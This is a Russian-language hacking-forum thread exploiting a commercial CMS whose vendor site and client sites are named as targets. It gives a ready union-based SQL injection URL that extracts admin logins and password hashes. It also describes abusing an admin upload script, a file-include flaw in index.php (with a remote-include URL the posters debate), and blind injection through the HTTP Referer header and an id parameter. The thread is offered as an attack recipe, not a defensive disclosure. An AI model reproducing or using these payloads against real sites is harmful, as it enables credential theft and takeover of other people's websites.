by me)

коммерческая платная цмс, производитель
http://mirrorcms.ru

там же представлены все сайты на это цмс

$sSQL="SELECT ".$suffx."_page.title from _page where _page.id='".$_GET['doc']."'";

select usr_login,usr_password from usertable

Если установлен мод рерайт, то название модуля берем из названия первого каталога ..
Например офф сайт

http://mirrorcms.ru/news/36/

аналогично

http://mirrorcms.ru/?ip=news&doc=36


http://mirrorcms.ru/?ip=news&doc=-1+union+select+1,2,3,concat(usr_login,char(64),usr _password),5,6,7,8,9+from+usertable/*


md5()


проблема в том что админка при инстале указывается вручную, поэтому стандартно /admin/ встречается на 2-3 сайтах.


Вообще отпадает смысл в скуле, если мы находим админку.. тогда идем в

http://site.com/админка/template/imageload.php

вводим сверху диру где разрешена запись (у меня на 4х сайтах оказалась не просто ?image/ как по дэфолту.. а /stock/images/


и третья уязвиость - локальный инклуд при magic quotes off в index.php

if(file_exists("$ip/docn.php")){
include("$ip/docn.php"); }

и третья уязвиость - локальный инклуд при magic quotes off в index.php
Больше похоже на удаленный.

Какой же он локальный? Что мешает залить на народ.ру файл docn.php и инклудить так:

http://[target]/index.php?ip=http://www.hack.narod.ru

Мешает file_exists. Инклуд локальный.

ммм.. небольшое дополнение..

там же в индексе.. посимвольный (т.к. нет вывода) брут в HTTP_REFERER

stat.php:
...
$rname=getenv("HTTP_REFERER");
$doc_res=my_query("SELECT * from referer WHERE rname='$rname' AND datein='$datein'");
...



Капча

./img.php

при register_globals on имеем посимвольный брут в параметре id.. кстати.. походу без регистр глобалс сам скрипт не будет работать =)


ЗЫ

маднет прав. file_exist возвращает тру только при наличие файла на локалхосте +\

если попытаться скормить ему любой вид урла, возвращает false